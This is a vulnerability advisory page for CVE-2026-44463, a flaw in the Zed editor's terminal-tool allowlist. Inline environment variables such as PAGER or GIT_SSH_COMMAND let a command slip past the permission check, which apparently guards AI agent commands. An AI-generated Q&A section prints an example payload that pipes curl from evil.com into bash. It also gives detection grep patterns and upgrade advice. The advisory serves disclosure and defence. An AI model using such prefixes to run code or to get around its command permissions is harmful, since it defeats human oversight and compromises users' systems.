CVE-2026-44463
Zed Code Editor Terminal Permission Bypass via Environment Variables
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| zed | zed | to 0.229.0 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-184 | The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-44463 is a vulnerability in Zed's terminal tool permission system that allows an attacker to bypass allowlist restrictions by injecting environment variables into commands.
The issue arises because Zed's regex-based allowlist does not account for environment variable prefixes (e.g., VAR=value cmd), which are supported by tools like Bash and CLI utilities such as git.
By prepending environment variables to allowlisted commands, an attacker can manipulate behavior of tools that respect user-controlled environment variables (e.g., PAGER, EDITOR, or GIT_SSH_COMMAND).
For example, a command like PAGER=curl git diff would execute curl as the pager instead of the default, potentially leading to arbitrary code execution if the attacker controls the environment variable value (e.g., PAGER="curl evil.com | bash" git diff).
This affects tools like git, less, and man, creating a broad attack surface.
How can this vulnerability impact me? :
This vulnerability can lead to arbitrary code execution by allowing attackers to bypass permission restrictions and hijack program behavior through environment variable manipulation.
The impacts include high confidentiality, integrity, and availability loss, meaning sensitive data could be exposed or altered, and system availability could be compromised.
Because it affects common tools like git, less, and man, the attack surface is broad, increasing the risk of exploitation.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if environment variable assignments are being prepended to allowlisted commands in Zed's terminal tool usage. Specifically, look for commands where environment variables like PAGER, EDITOR, or GIT_SSH_COMMAND are set inline before allowlisted commands such as git, less, or man.
You can inspect running processes or command histories for suspicious patterns like:
- grep -E '^[A-Z_]+=.+ (git|less|man)' ~/.bash_history
- ps aux | grep -E '^[A-Z_]+=.+ (git|less|man)'
- Check environment variables used in commands by reviewing scripts or tool invocations that might prepend environment variables to allowlisted commands.
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to upgrade Zed to version 0.229.0 or later, where the issue has been fixed.
Additionally, avoid allowing untrusted users or AI agents to influence environment variables that are prepended to allowlisted commands, as this can lead to arbitrary code execution.
Review and restrict the use of environment variable assignments in command invocations within your systems and scripts.